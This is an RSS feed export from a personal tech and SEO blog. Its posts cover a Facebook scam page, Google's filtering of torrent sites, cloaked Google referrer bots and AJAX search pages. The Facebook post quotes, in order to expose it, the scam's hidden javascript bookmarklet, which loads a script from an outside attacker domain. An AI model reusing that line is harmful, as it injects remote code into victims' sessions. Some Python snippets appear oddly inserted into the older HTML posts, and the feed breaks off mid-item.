<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Smackdown! &#187; On The Ball-ness</title>
	<atom:link href="http://smackdown.blogsblogsblogs.com/category/on-the-ball-ness/feed/" rel="self" type="application/rss+xml" />
	<link>http://smackdown.blogsblogsblogs.com</link>
	<description>Smackdown!</description>
	<lastBuildDate>Tue, 22 Nov 2011 22:40:24 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>What&#8217;s A Faster Way To Get A Virus Than Browsing Porn? That&#8217;s Right: The New Facebook</title>
		<link>http://smackdown.blogsblogsblogs.com/2011/05/04/whats-a-faster-way-to-get-a-virus-than-browsing-porn-thats-right-the-new-facebook/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2011/05/04/whats-a-faster-way-to-get-a-virus-than-browsing-porn-thats-right-the-new-facebook/#comments</comments>
		<pubDate>Wed, 04 May 2011 17:23:26 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[bad research]]></category>
		<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[On The Ball-ness]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=974</guid>
		<description><![CDATA[Quit staring, it&#8217;s just a thumb. Facebook has never been known for its safety. It is a site designed so that the least Internet-savvy people out there can sign up and network with millions of other people, both those they know and those they don&#8217;t, with only a minimal amount of technical know-how required [...]]]></description>
			<content:encoded><![CDATA[<div style="float:right; margin: 4px;"><img src="/images/condom-thumb2.png" onmouseup="hl2l(event);" alt="Quit staring, it is just a thumb."><br /><em style="font-size: 10px;">Quit staring, it&#8217;s just a thumb.</em></div>
<p> Facebook has never been known for its safety. It is a site designed so that the least Internet-savvy people out there can sign up and network with millions of other people, both those they know and those they don&#8217;t, with only a minimal amount of technical know-how required (i.e., how to sign up and how to browse). It is a giant playground filled with games and people to talk to from all over the world, luring in droves of people who, when they come, know nothing about &#8220;scareware&#8221;, or &#8220;phishing scams&#8221;, or even how to clean a virus from their machine if they get one. Sure, they&#8217;ve been told that if they visit porn sites they could very well get a virus, but hey, this is Facebook, <em>everyone</em> is on Facebook&#8230; it must be safe. The result is a gigantic community of <span id="more-974"></span><a href="http://en.wikipedia.org/wiki/Confidence_trick" target="_blank">gullible marks</a> just waiting to be exploited or infected by scammers and hackers.</p>
<p>That is why a couple of years ago I wrote a post on <a href="http://smackdown.blogsblogsblogs.com/2009/12/18/facebook-twitter-myspace-hacking-how-to-keep-it-from-happening-to-you/" target="_blank">how to prevent getting hacked on Facebook</a> (as well as on Twitter or Myspace). I happen to have quite a few friends and family who are not highly knowledgeable when it comes to the Internet, and through talking to them I came to realize that some of the things I take for granted many people were just not aware of. In the article I went into depth on some of the very basics of Internet security, such as what is the address bar in the browser, and how you needed to be <em>sure</em> you were on the site you thought you were on. That one simple tip could have saved millions of victims of phishing scams, had they just known where to look. Now, some fucking moron developer employed by Mark Zuckerberg has gone and rendered that advice pretty much pointless, at least as far as Facebook is concerned.</p>
<p>For those of you who own WordPress blogs, you are probably aware that if you get hacked one of the biggest dangers to your readers is the <a href="http://www.google.com/search?num=100&#038;q=iframe+hack+wordpress" target="_blank">iframe hack</a>. For those of you who don&#8217;t, or who are not familiar with HTML, an iframe is an element on a webpage that allows you to embed a second webpage into it. It&#8217;s very common and a perfectly normal feature of HTML. Iframes in and of themselves are not dangerous. Google AdSense, when shown on a webpage other than Google, is in an iframe. The same goes for Facebook &#8220;Like&#8221; buttons. So when you visit a page that has either of those, you are visiting Google or Facebook at the same time. The important thing for webmasters to note is that <em>you only ever embed iframes from sites you trust</em>. This is so crucial because once you embed an iframe from a site other than your own, you have no control whatsoever over what content is served from that iframe to your visitors. None. Nada. Zilch.</p>
<p>The reason that hackers like utilizing iframes for hacking is that it allows them to serve malicious code and viruses to people while they are visiting sites that they trust. If you are out there browsing some seedy sites and popups show up telling you to click on a link or that you might have a virus you are much less likely to believe it. It&#8217;s simple psychology, and your guard is already up. This is much less true if you are on a site you visit every single day with no problems.</p>
<p>Apparently I missed it when it happened, but a couple of months ago some genius programmer at Facebook decided to introduce a way for people to <a href="http://developers.facebook.com/blog/post/462" target="_blank">embed iframes</a> in Facebook Pages. I only found out about it myself when I discovered one of these pages yesterday. It was a link on a friend&#8217;s wall purporting to show pics of Osama bin Laden dead. I could tell right away that it was a scam, so I went to see just how potentially damaging it was. The first thing that struck me was that this was a page actually on Facebook itself, although it was giving instructions to enter a series of keyboard commands, as if there were Javascript it was trying to get you to trigger. I moused around a bit, and realized there were some hidden forms on the page, which was really odd, so I went ahead and turned off all styles on the page. That&#8217;s when I saw what was going on. This is what the page looked like with normal styles turned on:</p>
<p>&nbsp;</p>
<p><a href="/images/facebook-page-with-iframe.png" target="_blank"><img src="/images/facebook-page-with-iframe-sm.png" onmouseup="hl2l(event);" alt="Facebook page with iframe" border="0"></a><br />
(<em>click to enlarge</em>)</p>
<p>&nbsp;</p>
<p>Clicking that button then revealed these instructions:</p>
<p>&nbsp;</p>
<p><img src="/images/facebook-iframe-instructions.png" onmouseup="hl2l(event);" alt="Facebook page with iframe instructions" border="0"></p>
<p>&nbsp;</p>
<p>What was not revealed, however, was the hidden &lt;textarea&gt; containing Javascript code that would then be fired if you did follow those instructions:</p>
<p>&nbsp;</p>
<p><code>&lt;textarea id="c"&gt;javascript:(a=(b=document).createElement('script')).src='//themafiafamily.net/bin/bl.js',b.body.appendChild(a);void(0)&lt;/textarea&gt;</code></p>
<p>&nbsp;</p>
<p>This causes a script to be injected from a domain owned by some hacker, themafiafamily.net, and it&#8217;s all downhill from there.</p>
<p>Of course, odds are pages like this won&#8217;t stay up for too long when they are created. There is a way to report them, and Facebook will eventually take them down once they investigate. However, there is no way to report them in a way that gets them dealt with in a timely manner. There is no &#8220;This page is hacking users&#8221; option. In fact, if you look at the &#8220;Like&#8221; counter on that page you can see that it had already hit over 109,000 people by the time I saw it, and who knows how many more before Facebook bothered to respond to the reports about it. Additionally, there is nothing stopping a hacker from running a <em>legitimate</em> page for a few weeks, attracting millions of people, and then deciding to hit them all with a virus afterwards.</p>
<p>The bottom line is that Facebook&#8217;s failure to address these issues and remove the ability to embed iframes borders on negligence. Currently the <a href="http://www.ftc.gov/" target="_blank">FTC</a> goes after companies and organizations that do not adequately <a href="http://www.ftc.gov/opa/2011/05/security.shtm" target="_blank">protect their users&#8217; data</a>:</p>
<p> &nbsp;</p>
<p><a href="http://twitter.com/FTCgov/status/65780912843014144" target="_blank"><img src="/images/ftc-consumer-info-tweet.png" onmouseup="hl2l(event);" alt="Since 2001, the FTC has brought 34 law enforcement actions against businesses that allegedly failed to protect consumers personal info." border="0"></a></p>
<p>&nbsp;</p>
<p>Maybe they should start taking a look at companies that don&#8217;t adequately protect the actual users as well.</p>
<div><em>Thumb (yes, it&#8217;s a thumb) in <a href="http://www.flickr.com/photos/figleaf/491966201/" target="_blank">condom</a> image attribution goes to <a href="http://www.flickr.com/photos/figleaf/">figleaf</a>.</em></div>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2011/05/04/whats-a-faster-way-to-get-a-virus-than-browsing-porn-thats-right-the-new-facebook/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Google Censors Torrent Sites &#8211; Except For The Pirate Bay</title>
		<link>http://smackdown.blogsblogsblogs.com/2011/01/27/google-censors-torrent-sites-except-for-the-pirate-bay/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2011/01/27/google-censors-torrent-sites-except-for-the-pirate-bay/#comments</comments>
		<pubDate>Thu, 27 Jan 2011 17:49:18 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[On The Ball-ness]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=883</guid>
		<description><![CDATA[Yesterday Search Engine Land reported on Google removing piracy-related terms from its Instant Search, which includes the word torrents, names of torrent sites, names of torrent clients, and other file sharing sites such as RapidShare and Megaupload. This does raise some concerns, seeing as how, as SELand&#8217;s Matt McGee mentions, torrents and file sharing sites [...]]]></description>
			<content:encoded><![CDATA[<p>Yesterday Search Engine Land reported on <a href="http://searchengineland.com/google-removes-piracy-related-terms-from-instant-search-62597" target="_blank">Google removing piracy-related terms from its Instant Search</a>, which includes the word torrents, names of torrent sites, names of torrent clients, and other file sharing sites such as RapidShare and Megaupload. This does raise some concerns, seeing as how, as SELand&#8217;s <a href="http://twitter.com/mattmcgee" target="_blank">Matt McGee</a> mentions, torrents and file sharing sites in and of themselves are not inherently illegal. Of course, neither is porn, but Google seems to have seen fit to <a href="http://mashable.com/2010/09/08/google-instant-search-naughty-words/" target="_blank">remove that genre from its Instant Search</a> as well.</p>
<p>Does this mean that Google really hates torrent sites? Well, not all of them, apparently. <a href="http://thepiratebay.org/" target="_blank">The Pirate Bay</a>, the world&#8217;s largest BitTorrent tracker, <span id="more-883"></span>is still receiving much love from Google:</p>
<p>&nbsp;</p>
<p><a href="/images/google-loves-pirate-bay2.png" target="_blank"><img src="/images/google-loves-pirate-bay2-sm.png" onmouseup="hl2l(event);" alt="The worlds most resilient bittorrent site." border="0"></a><br />
(<em>click to enlarge</em>)</p>
<p>&nbsp;</p>
<p>How long this listing will last is anyone&#8217;s guess, but it is interesting in light of the fact that it is the most notorious of all the torrent sites out there. Kind of odd that this would be the one that they missed in their censorship sweep. </p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2011/01/27/google-censors-torrent-sites-except-for-the-pirate-bay/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>My Mom Needed Me To Let The Plumber In While She Was At Work (True Story)</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/05/31/my-mom-needed-me-to-let-the-plumber-in-while-she-was-at-work-true-story/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2010/05/31/my-mom-needed-me-to-let-the-plumber-in-while-she-was-at-work-true-story/#comments</comments>
		<pubDate>Tue, 01 Jun 2010 02:54:41 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[how-to]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[On The Ball-ness]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=687</guid>
		<description><![CDATA[I work from my house and keep odd hours, so when a family member needs some sort of worker let into their house during the day I am often asked if I am available to do it. I don&#8217;t mind, we all live fairly close together, and it&#8217;s not that much of a hassle on [...]]]></description>
			<content:encoded><![CDATA[<p><img src="/images/bathtub-drain.jpg" onmouseup="hl2l(event);" style="float: right;" alt="Complex bath mechanisms"> I work from my house and keep odd hours, so when a family member needs some sort of worker let into their house during the day I am often asked if I am available to do it. I don&#8217;t mind, we all live fairly close together, and it&#8217;s not that much of a hassle on most days. Tonight my mom called and asked me if I could let someone in to her place tomorrow to look at her tub, because it&#8217;s clogged. She&#8217;s tried Drano twice, poured boiling hot water in it, and even tried plunging it, all to no avail. I told her it would be no problem for me to let someone in.</p>
<p>A little while later I went into my own bathroom, and while in there happened to glance at my own tub&#8230;<span id="more-687"></span></p>
<p>I called her back and asked her how much water was in her tub. She said maybe an inch or so. I asked her to go look at it, and she informed me that she was already in there.</p>
<p><strong>Me:</strong> &#8220;You know that little lever just below the spout? Is it pointed up, or down?&#8221;</p>
<p><strong>My mom:</strong> &#8220;Up&#8221;</p>
<p><strong>Me:</strong> &#8220;Push it down&#8221;</p>
<p>(<em>silence&#8230; except for the sound of water draining from her tub&#8230;</em>)</p>
<p><strong>My mom:</strong> &#8220;Who the fuck put that up???&#8221;</p>
<p><em>At this point I can barely breathe because I am laughing so hard. She adds more water to the tub, just to make sure it actually is going down, and swears some more.</em></p>
<p><strong>Me:</strong> &#8220;Mom, how long has your tub been &#8216;clogged&#8217;?&#8221;</p>
<p><strong>My mom:</strong> &#8220;A week&#8221;</p>
<p>I lost it. I&#8217;m still giggling as I write this. During her extensive cussing she tried to get me to swear never to tell a soul, but I just had to share. <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p><em>You may also like:</em> <a href="http://smackdown.blogsblogsblogs.com/2011/09/04/taylor-swifts-um-like-youtube-interview/">Taylor Swift&#8217;s, Um, Like, YouTube Interview</a></p>
<div><em><a href="http://www.flickr.com/photos/warrenski/2775894594/" target="_blank">Bathtub drain image</a> attribution goes to <a href="http://www.flickr.com/photos/warrenski/">warrenski</a>.</em></div>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2010/05/31/my-mom-needed-me-to-let-the-plumber-in-while-she-was-at-work-true-story/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Is Google Referrer Spamming Too Now?</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/02/16/is-google-referrer-spamming-too-now/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2010/02/16/is-google-referrer-spamming-too-now/#comments</comments>
		<pubDate>Tue, 16 Feb 2010 13:59:41 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[MSN]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[search engines]]></category>
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=463</guid>
		<description><![CDATA[Yesterday a friend of mine sent me a section of her traffic logs that were showing some odd information. According to what was recorded there her brand new, as of yet unlinked-to website was ranking on the first page of Google for the single keyword, [free]. If she actually had managed to rank for that [...]]]></description>
			<content:encoded><![CDATA[<p>Yesterday a friend of mine sent me a section of her traffic logs that were showing some odd information. According to what was recorded there her brand new, as of yet unlinked-to website was ranking on the first page of Google for the single keyword, [<a href="http://www.google.com/search?q=free" target="_blank">free</a>]. If she actually had managed to rank for that phrase it would be an amazing feat to say the least. The competition for that single word is enormous. Unsurprisingly, when performing that actual search her site is nowhere to be found. The site in question is barely one week old, and hasn&#8217;t even been launched yet.</p>
<p>What is surprising, to me anyways, is that it appears that the traffic is actually coming from a bot at Google&#8230; a bot that is cloaked, sending fake<span id="more-463"></span> referrers, and behaving in exactly the same manner as <a href="http://smackdown.blogsblogsblogs.com/2007/11/13/microsoft-needs-to-quit-fucking-with-my-adsense-scripts/" target="_blank">MSN&#8217;s referrer spamming</a> bot that first showed up a little over 2 years ago. I blogged about it back then, as did <a href="http://sebastians-pamphlets.com/msn-admits-clueless-and-ineffective-spamming/" target="_blank">many</a> <a href="http://ekstreme.com/thingsofsorts/blogging/yell-if-microsofts-livecom-spammed-you-too" target="_blank">others</a>. Eventually, after much feedback from the community, they <a href="http://www.seroundtable.com/archives/020672.html" target="_blank">did halt</a> the referrer spam practice. It was a bad idea for them to do it in the first place, and quite a few webmasters were perturbed about it. Two years was too long for it to go on, but at least they did finally stop doing it.</p>
<p>Now it looks like Google, for some unfathomable reason, has decided to start doing the exact same thing. The entries in my friend&#8217;s traffic logs looked like this:</p>
<blockquote class="eml"><p>74.125.126.81 - - [14/Feb/2010:16:34:03 -0600] "GET / HTTP/1.1" 200 19361 "http://www.google.com/search?hl=en&#038;q=free&#038;btnG=Google+Search&#038;aq=f&#038;oq=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"</p>
<p>72.14.192.3 - - [14/Feb/2010:16:36:28 -0600] "GET / HTTP/1.1" 200 19361 "http://www.google.com/search?hl=en&#038;q=free&#038;btnG=Google+Search&#038;aq=f&#038;oq=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"</p></blockquote>
<p>The IPs in question definitely belong to Google (as can be seen here <a href="http://ws.arin.net/whois/?queryinput=74.125.126.81" target="_blank">74.125.126.81</a>, and here <a href="http://ws.arin.net/whois/?queryinput=72.14.192.3" target="_blank">72.14.192.3</a>). However, unlike normal Googlebot IPs, these are not associated with the Google domain name via DNS. For instance, if you do a host lookup on 66.249.71.233 you will see that it resolves to the hostname crawl-66-249-71-233.googlebot.com. The IPs that the referrer spam is coming from do not resolve to any hostname. Presumably, going on the logic that MSN gave when they were first called out for doing this, the reason for not having a reverse DNS entry associated with the IPs is to hide the fact that they actually are from Google. Similarly, the user-agent of these bots is being cloaked as well. Instead of actually identifying as Googlebot, &#8220;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#8221;, these bots are pretending to be an actual user using IE6 on Windows.</p>
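<p>For anyone who wants to run the same check against their own logs, here is a minimal Python sketch of the reverse-then-forward DNS test described above. The function name <code>is_verified_googlebot</code>, its two optional lookup parameters, and the list of accepted hostname suffixes are assumptions made up for this illustration; only the standard-library <code>socket</code> calls are real.</p>

```python
import socket

# Hostname suffixes treated as genuine Google crawlers (an assumption for this sketch).
GOOGLE_SUFFIXES = (".googlebot.com", ".google.com")


def is_verified_googlebot(ip, reverse_lookup=None, forward_lookup=None):
    """Return True only if ip has a Google PTR record that resolves back to ip.

    reverse_lookup and forward_lookup are hypothetical hooks so the check can
    be exercised without network access; by default they use live DNS.
    """
    if reverse_lookup is None:
        reverse_lookup = lambda addr: socket.gethostbyaddr(addr)[0]
    if forward_lookup is None:
        forward_lookup = lambda host: socket.gethostbyname_ex(host)[2]

    try:
        hostname = reverse_lookup(ip).lower().rstrip(".")
    except (socket.herror, socket.gaierror):
        # No reverse DNS entry at all, like the IPs in the log lines above.
        return False

    if not hostname.endswith(GOOGLE_SUFFIXES):
        return False

    try:
        # The forward lookup must lead back to the same IP, otherwise
        # anyone could point a PTR record at a googlebot.com name.
        return ip in forward_lookup(hostname)
    except socket.gaierror:
        return False
```

<p>Called with just an IP address it performs live lookups. An address with no reverse DNS entry fails the check no matter what user-agent it claims to be.</p>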
<p>Unlike actual web surfers, Google, you have no expectation of privacy. When you are a bot, skulking around trying to disguise yourself as someone else is poor netiquette to say the least. I am not sure exactly what prompted you to start doing this, but you really should just stop.</p>
<p><strong>Update:</strong></p>
<p>Barry Schwartz of Search Engine Land contacted Google about this, and they <a href="http://searchengineland.com/is-google-referrer-spamming-to-detect-spam-36453/" target="_blank">replied back</a> that this is indeed them performing cloaked spidering. However, according to them it is not being done for spam detection purposes, and the particular referrers used were in error:</p>
<blockquote><p>Turns out, we were running an experiment to detect malware targeting Hot Trends queries related to the Haiti crisis. Because this experiment was developed in response to an urgent situation we moved quickly and as a result used an incorrect Google search referrer which we’re now working to fix. Thanks for calling this issue to our attention and we apologize for any confusion we may have caused.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2010/02/16/is-google-referrer-spamming-too-now/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Google Re-initiates Testing of AJAX SERP&#8217;s With Faulty Proposed Fix</title>
		<link>http://smackdown.blogsblogsblogs.com/2009/03/13/google-re-initiates-testing-of-ajax-serps-with-faulty-proposed-fix/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2009/03/13/google-re-initiates-testing-of-ajax-serps-with-faulty-proposed-fix/#comments</comments>
		<pubDate>Fri, 13 Mar 2009 16:14:11 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[Cuttisms]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=297</guid>
		<description><![CDATA[Last month I blogged about the fact that I had noticed that Google was playing around with delivering the SERP&#8217;s via AJAX. I pointed out that due to the way that referrers work, using AJAX to generate the pages would cause all traffic coming from Google to look like it was coming from Google&#8217;s homepage [...]]]></description>
			<content:encoded><![CDATA[<p>Last month I blogged about the fact that I had noticed that <a href="http://smackdown.blogsblogsblogs.com/2009/02/02/what-will-really-break-if-google-switches-to-ajax/" target="_blank">Google was playing around with delivering the SERP&#8217;s via AJAX</a>. I pointed out that due to the way that referrers work, using AJAX to generate the pages would cause all traffic coming from Google to look like it was coming from Google&#8217;s homepage instead of from a search. This means in turn that analytics packages, including Google Analytics, would no longer be able to track which keywords searched for in Google were sending traffic to webmasters&#8217; websites. There was a <a href="http://getclicky.com/blog/150/googles-new-ajax-powered-search-results-breaks-search-keyword-tracking-for-everyone" target="_blank">bit of a buzz</a> about it, and Google seemed to stop the testing shortly thereafter. <a href="http://searchengineland.com/google-ajax-search-results-death-to-search-term-tracking-16431" target="_blank">Google&#8217;s only reply</a> on the subject was to say &#8220;sometimes we test stuff&#8221;, to point to a <a href="http://googleblog.blogspot.com/2006/04/this-is-test-this-is-only-test.html" target="_blank">post from three years ago</a> that also said &#8220;sometimes we test stuff&#8221;, and to say that they didn&#8217;t intend to break referrer tracking. That was it.</p>
<p>Shortly thereafter, the tests<span id="more-297"></span> appeared to have stopped. People stopped thinking that Google was linking to them from their homepage, and in very short order the buzz about it died down. </p>
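<p>To make the referrer problem concrete, here is a small Python sketch of what an analytics package sees in each case. It assumes the AJAX results page keeps the search in the part of the URL after the <code>#</code>, which browsers do not include in the Referer header. Both example URLs and both function names are hypothetical, chosen only for this illustration.</p>

```python
from urllib.parse import parse_qs, urldefrag, urlparse


def referer_sent_by_browser(page_url):
    """Browsers drop the #fragment before sending a URL as the Referer header."""
    return urldefrag(page_url).url


def search_keywords(referer):
    """Return the q= search phrase from a referrer URL, or None if there is none."""
    terms = parse_qs(urlparse(referer).query).get("q")
    return terms[0] if terms else None


# Hypothetical result-page URLs for the same search: classic style vs. AJAX style.
classic_page = "http://www.google.com/search?q=free"
ajax_page = "http://www.google.com/#q=free"

for page in (classic_page, ajax_page):
    referer = referer_sent_by_browser(page)
    # Print the referrer the destination site receives and the keyword it can recover.
    print(referer, search_keywords(referer))
```

<p>With the classic URL the keyword survives in the referrer. With the AJAX-style URL the destination site only ever sees Google&#8217;s homepage, so there is nothing left to extract.</p>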
<p>Yesterday afternoon, someone pointed out to me that the subject came up again during Matt Cutts&#8217; keynote address at PubCon South. According to <a href="http://outspokenmedia.com/internet-marketing-conferences/pubcon-keynote-matt-cutts/" target="_blank">Lisa Barone&#8217;s live blogging efforts</a> the conversation went something like this:</p>
<blockquote><p>Brett: How about the JavaScript test.</p>
<p>Matt: That was really funny. The team there only thinks about speed. They want to get the results back to users as quick as humanly possible.  JavaScript makes the search results a lot faster. Suppose you do a search for flowers, as you’re typing flowers, they can do a query from the back end and fold search results right into the page. You’re still in Google.com and they can pull in the results automatically.  It doesn’t give you the referrer. <strong>He says the team didn’t think about the referrer aspect. So they stopped.  They’ve paused it until they can find out how to keep the referrers.</strong></p></blockquote>
<p>Ok, fine. So they didn&#8217;t know about the referrer issue (and didn&#8217;t give me credit for pointing it out to them before it was more than just a test, *cough* *cough*), so they stopped until they can figure out a way to fix it.</p>
<p>Less than 1 hour after reading that, I happened to notice an over-abundance of URLs in the serps that were getting redirected through Google&#8217;s url redirection service. For those who are unaware of what I mean by that, it is a tool that Google uses to enhance their own behind-the-scenes tracking of user behavior. You can see it most consistently when Google displays sitelinks. They redirect the clicks through their own tracking mechanism first, so that they can determine how many people are actually using those extra links. Instead of going directly to the page in question, it goes through a link like this:</p>
<p><a href="http://www.google.com/url?q=http://www.bad-neighborhood.com/text-link-tool.htm&#038;ei=in66ScnjBtKgtwfn0LTiDw&#038;sa=X&#038;oi=smap&#038;resnum=1&#038;ct=result&#038;cd=1&#038;usg=AFQjCNF9RdVC6vXBFOYvdia1s_ZE_BMu8g" target="_blank">http://www.google.com/url?q=http://www.bad-neighborhood.com/text-link-tool.htm&#038;ei=in&#8230;</a></p>
<p>If you view one of those links using a <a href="http://www.bad-neighborhood.com/header_detector.php" target="_blank">header detector</a>, you can see that after doing whatever tracking they do on their backend, they then redirect the user via a 302 Redirect onwards to the final destination page:</p>
<blockquote class="eml"><p>User-Agent used to fetch header:<br />
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008051206 Firefox/3.0</p>
<p>HTTP/1.0 302 Found<br />
Location: http://www.bad-neighborhood.com/text-link-tool.htm<br />
Cache-Control: private<br />
Content-Type: text/html; charset=UTF-8<br />
Date: Fri, 13 Mar 2009 15:44:42 GMT<br />
Server: gws<br />
Content-Length: 247</p></blockquote>
<p>Occasionally you will see these Google redirects in the normal serps as well, although usually not. The thing is, I was seeing them on every search I performed. It struck me as odd, until I suddenly realized that <em>every search was being done via AJAX</em>:</p>
<p><img src="/images/ajax-urls-again.png" alt="Google testing AJAX serps  again" onmouseup="hl2l(event);" class="centered"></p>
<p><img src="/images/google-url-intercept.png" alt="Google redirecting all serps traffic through Google.com" onmouseup="hl2l(event);" class="centered"></p>
<p>Here&#8217;s the problem, Google. That will <em>not</em> fix the referrer issue, which is the issue for every non-Google analytics package that exists. Without the referrer, the traffic coming from Google cannot be accurately analyzed (unless, of course, the analytics program has access to whatever it is that Google&#8217;s redirect script is recording). For one, a 302 redirect passes on the referrer of the original page, not the one of the tracking script, and for another there are no unencrypted keywords included in your tracking urls. It doesn&#8217;t take pushing the test to the live servers to figure this out, either. The engineers <em>had</em> to have known this beforehand. This means that if Matt was correct, and Google did indeed stop the testing until they could make it work with analytics, then <strong>the <em>only</em> analytics package they were worried about AJAX serps working with is Google Analytics</strong>.</p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2009/03/13/google-re-initiates-testing-of-ajax-serps-with-faulty-proposed-fix/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Robert Scoble Chews Out Lisa Barone&#8217;s Ass For Taking His Name In Vain &#8211; WTF?</title>
		<link>http://smackdown.blogsblogsblogs.com/2009/03/02/robert-scoble-chews-out-lisa-barones-ass-for-taking-his-name-in-vain-wtf/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2009/03/02/robert-scoble-chews-out-lisa-barones-ass-for-taking-his-name-in-vain-wtf/#comments</comments>
		<pubDate>Tue, 03 Mar 2009 04:36:34 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[psychoblogging]]></category>
		<category><![CDATA[Social Media]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=292</guid>
		<description><![CDATA[Tonight Robert &#8216;I Am Thy Lord And Thou Shalt Kneel, Bitches!&#8217; Scoble, a blogger who has some claim to internet fame through his blog Scobleizer, decided that the title of &#8220;technical evangelist&#8221; that has often been attributed to him simply wasn&#8217;t enough, and that deity is apparently more fitting. Lisa Barone wrote a piece talking about [...]]]></description>
			<content:encoded><![CDATA[<p>Tonight <a href="http://twitter.com/Scobleizer" target="_blank">Robert &#8216;I Am Thy Lord And Thou Shalt Kneel, Bitches!&#8217; Scoble</a>, a blogger who has some claim to internet fame through his blog Scobleizer, decided that the title of &#8220;<a href="http://en.wikipedia.org/wiki/Robert_Scoble" target="_blank">technical evangelist</a>&#8221; that has often been attributed to him simply wasn&#8217;t enough, and that deity is apparently more fitting.</p>
<p>Lisa Barone <a href="http://outspokenmedia.com/branding/false-idols/" target="_blank">wrote a piece</a> talking about personal brands and false idols on the web. In it she wrote the following paragraph:</p>
<blockquote><p>Don&#8217;t support personal brands built on smoke and mirrors. Make people work for the brands they&#8217;re trying to create. Don&#8217;t let them <strong>scoble</strong> their way in. Don&#8217;t accept that someone is important just because they act like they are or someone told you they were.</p></blockquote>
<p>Apparently Robert is the ultra sensitive type, and didn&#8217;t take too kindly<span id="more-292"></span> to her choice of wordage. Here is his reply:</p>
<p><img src="/images/scoble.png" alt="...you might do some research behind how I actually got here before you take my name in vain. - Robert Scoble" onmouseup="hl2l(event);" class="centered"></p>
<p>Wow, Bob. Way to identify with the lowly masses out there. <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2009/03/02/robert-scoble-chews-out-lisa-barones-ass-for-taking-his-name-in-vain-wtf/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>SERPs Scrapers, Rejoice! Matt Cutts Endorses Indexing Of Search Results In Google!</title>
		<link>http://smackdown.blogsblogsblogs.com/2009/01/21/serps-scrapers-rejoice-matt-cutts-endorses-indexing-of-search-results-in-google/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2009/01/21/serps-scrapers-rejoice-matt-cutts-endorses-indexing-of-search-results-in-google/#comments</comments>
		<pubDate>Wed, 21 Jan 2009 22:39:52 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
